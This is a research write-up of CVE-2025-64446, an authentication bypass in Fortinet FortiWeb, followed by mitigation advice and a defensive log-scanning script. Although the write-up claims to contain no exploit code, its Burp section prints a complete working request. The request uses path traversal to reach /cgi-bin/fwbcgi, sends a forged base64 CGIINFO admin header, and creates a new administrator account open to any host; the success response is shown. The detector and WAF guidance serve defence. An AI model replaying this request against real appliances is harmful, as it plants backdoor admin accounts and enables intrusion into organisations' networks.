CVE-2025-64446-Proxy_Record_Exploit-8.0.0-Burp + Virtual Machine + Video
# CVE-2025-64446 – Fortinet FortiWeb Authentication Bypass (Research Overview) | Path Traversal Vulnerability
## Overview
This document provides a **research‑grade analysis** of CVE‑2025‑64446, an authentication bypass vulnerability discovered in Fortinet FortiWeb appliances.
It is intended *only* for academic, defensive security testing in controlled lab environments.
No exploit code is included in this document.
---
## Vulnerability Summary
CVE‑2025‑64446 enables an attacker to interact with administrative API endpoints **without valid authentication**, due to improper trust validation in a CGI parsing flow.
A malicious request can trigger the backend logic responsible for administrative actions, bypassing permission checks.
Impact includes:
- Unauthorized access to sensitive endpoints
- Potential privilege escalation
- Unauthorized configuration changes
- Administrative user creation
---
## Root Cause (High‑Level)
During analysis, researchers observed:
- The endpoint `/cgi-bin/fwbcgi` incorrectly trusted data passed through a crafted context header.
- Parameter parsing logic allowed insecure inheritance of admin privileges.
- Serialized/encoded CGI metadata was not validated before use.
This combination enabled unauthorized execution of administrative actions.
---
## Observed Response Behavior (Sanitized)
A vulnerable system may return HTTP `200 OK` to unauthorized admin‑level operations.
Example (sanitized):
```
HTTP/1.1 200 OK
Content-Type: application/json
{
"status": "success",
"code": 0,
"message": "Operation completed"
}
```
---
## Reproduction (Laboratory Only)
This section describes the workflow **without revealing technical payloads**:
1. Configure a security testing proxy (e.g., Burp).
2. Intercept traffic destined for FortiWeb.
3. Send a crafted administrative action request.
4. Observe whether the target responds with unauthorized administrative success.
5. Capture response artifacts for documentation.
Researchers should generate their own payloads in private lab environments.
## Burp:
- Request:
```
POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1
Host: 10.10.0.13
Accept-Encoding: gzip, deflate, br
Content-Length: 824
CGIINFO: eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ==
Content-Type: application/json
Connection: keep-alive
{"data": {"q_type": 1, "name": "1a1222a0", "access-profile": "prof_admin", "access-profile_val": "0", "trusthostv4": "0.0.0.0/0", "trusthostv6": "::/0", "last-name": "", "first-name": "", "email-address": "", "phone-number": "", "mobile-number": "", "hidden": 0, "comments": "", "sz_dashboard": -1, "type": "local-user", "type_val": "0", "admin-usergrp_val": "0", "wildcard_val": "0", "accprofile-override_val": "0", "sshkey": "", "passwd-set-time": 0, "history-password-pos": 0, "history-password0": "", "history-password1": "", "history-password2": "", "history-password3": "", "history-password4": "", "history-password5": "", "history-password6": "", "history-password7": "", "history-password8": "", "history-password9": "", "force-password-change": "disable", "force-password-change_val": "0", "password": "1a1222a0"}}
```
- Response:
```
HTTP/1.1 200 OK
Date: Mon, 17 Nov 2025 19:44:55 GMT
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Security-Policy: script-src 'self'; default-src 'self'; style-src 'self' 'unsafe-inline'; font-src 'self'; img-src 'self' data:; connect-src 'self'; frame-ancestors 'self'; object-src 'none'; base-uri 'self'; upgrade-insecure-requests; block-all-mixed-content;
X-Content-Type-Options: nosniff
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/json
Content-Length: 1204
{ "results": { "can_view": 0, "q_ref": 0, "can_clone": 1, "q_type": 1, "name": "1a1222a0", "access-profile": "prof_admin", "access-profile_val": "1008", "trusthostv4": "0.0.0.0\/0 ", "trusthostv6": "::\/0 ", "last-name": "", "first-name": "", "email-address": "", "phone-number": "", "mobile-number": "", "hidden": 0, "domains": "root ", "gui-global-menu-favorites": "", "gui-vdom-menu-favorites": "", "sz_dashboard": 8, "sz_gui-dashboard": 7, "type": "local-user", "type_val": "0", "admin-usergrp": "", "admin-usergrp_val": "0", "password": "ENC XXXX", "wildcard": "disable", "wildcard_val": "0", "accprofile-override": "disable", "accprofile-override_val": "0", "fortiai": "disable", "fortiai_val": "0", "sshkey": "", "passwd-set-time": 1763408695, "history-password-pos": 1, "history-password0": "ENC XXXX", "history-password1": "ENC XXXX", "history-password2": "ENC XXXX", "history-password3": "ENC XXXX", "history-password4": "ENC XXXX", "history-password5": "ENC XXXX", "history-password6": "ENC XXXX", "history-password7": "ENC XXXX", "history-password8": "ENC XXXX", "history-password9": "ENC XXXX", "force-password-change": "disable", "force-password-change_val": "0", "feature-info-ver": "" } }
```
---
## Video and reproduction:
[Patreon post with video and reproduction notes](https://www.patreon.com/posts/cve-2025-64446-8-143791801)
---
## Info:
[Fortinet PSIRT advisory FG-IR-25-910](https://fortiguard.fortinet.com/psirt/FG-IR-25-910)
---
## Mitigation & Recommendations
Likely mitigations include:
- Apply official vendor patches immediately.
- Do not expose management interfaces to public networks.
- Enforce strict role‑based access controls.
- Implement WAF rules to block malformed CGI context headers.
- Monitor logs for suspicious admin actions.
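The last two recommendations (WAF rules for malformed CGI context headers, log monitoring for suspicious admin actions) can be turned into a concrete detector. The following is an added example written for this page, not code from the researcher or from Fortinet: it scans request log lines for the three traits visible in the sanitized capture above, namely dot-segment traversal in the decoded path, a path that normalizes onto `/cgi-bin/fwbcgi` although it was routed through another prefix, and a client-supplied `CGIINFO` header. The log line format (`METHOD PATH HEADERS_JSON`) and the sample lines are constructed for the example and are an assumption; FortiWeb's own log format differs. Only the endpoint path and header name come from the page.

```python
import base64
import json
import posixpath
from typing import Optional
from urllib.parse import unquote

# Backend CGI endpoint and the context header named in the write-up above.
ADMIN_CGI_PATH = "/cgi-bin/fwbcgi"
CONTEXT_HEADER = "CGIINFO"

# Constructed sample log lines in a simplified "METHOD PATH HEADERS_JSON" shape
# (an assumption for this example, not FortiWeb's real log format). The first
# line mirrors the request path from the sanitized capture; its header value is
# built here rather than copied from the capture. The third line is a
# double-encoded variant that does not resolve onto the CGI path.
_CTX = base64.b64encode(json.dumps({"username": "admin"}).encode()).decode()
SAMPLE_LOG = [
    f'POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi {{"{CONTEXT_HEADER}": "{_CTX}"}}',
    'GET /api/v2.0/cmdb/system/admin {}',
    'POST /api/v2.0/cmdb/system/admin%252f..%252fcgi-bin%252ffwbcgi {}',
    'GET /api/v2.0/status {"Content-Type": "application/json"}',
]


def decode_path(raw_path: str) -> str:
    """Percent-decode twice so double-encoded separators are also exposed.

    The query string is deliberately not stripped first: the capture shows an
    encoded '?' (%3f) being treated as part of the path, so a detector that
    splits on '?' before normalizing would miss the traversal entirely.
    """
    return unquote(unquote(raw_path))


def decode_context_header(value: str) -> Optional[dict]:
    """Decode a base64-wrapped JSON context header; None if it is malformed."""
    try:
        parsed = json.loads(base64.b64decode(value, validate=True))
    except ValueError:  # covers binascii.Error, JSONDecodeError, UnicodeDecodeError
        return None
    return parsed if isinstance(parsed, dict) else None


def inspect_request(line: str) -> Optional[dict]:
    """Return a finding for a suspicious request line, or None if it looks benign."""
    method, raw_path, headers_json = line.split(" ", 2)
    headers = json.loads(headers_json)
    decoded = decode_path(raw_path)
    normalized = posixpath.normpath(decoded)
    signals = []

    # 1. Dot-segment traversal anywhere in the decoded path.
    if ".." in decoded.split("/"):
        signals.append("path_traversal")
    # 2. Route confusion: the normalized path lands on the backend CGI even
    #    though the request was sent under a different URL prefix.
    if normalized == ADMIN_CGI_PATH and not raw_path.startswith(ADMIN_CGI_PATH):
        signals.append("cgi_route_confusion")
    # 3. A CGI context header arriving from the client side; surface the
    #    identity it claims so an analyst can see which account was targeted.
    ctx_values = [v for k, v in headers.items() if k.upper() == CONTEXT_HEADER]
    claimed_user = None
    if ctx_values:
        signals.append("client_supplied_context_header")
        parsed = decode_context_header(ctx_values[0])
        claimed_user = parsed.get("username") if parsed else None

    if not signals:
        return None
    return {
        "method": method,
        "raw_path": raw_path,
        "normalized_path": normalized,
        "signals": signals,
        "claimed_user": claimed_user,
    }


def scan(lines) -> list:
    """Run the inspector over an iterable of log lines and keep the findings."""
    return [finding for finding in map(inspect_request, lines) if finding]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(json.dumps(finding))
```

The same three checks map directly onto WAF logic: reject any request whose decoded path contains a `..` segment, reject any path that normalizes onto `/cgi-bin/fwbcgi` from a different prefix, and strip or reject a `CGIINFO` header that was not set by the appliance itself. Alerting on the `claimed_user` field is useful because it shows which administrative identity a request attempted to inherit.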
---
## Ethical Notice
This documentation is for **defensive research only**.
Please don't test systems you do not own or have explicit permission to assess.
---
## Credits
Researcher: **nu11secur1ty (2025)**
Prepared for distribution to vulnerability analyzers and security researchers.
---
## Notes for PacketStorm Submission
- Include only sanitized Burp responses
- Do NOT include exploit code or live payloads
- Provide reproduction notes without operational details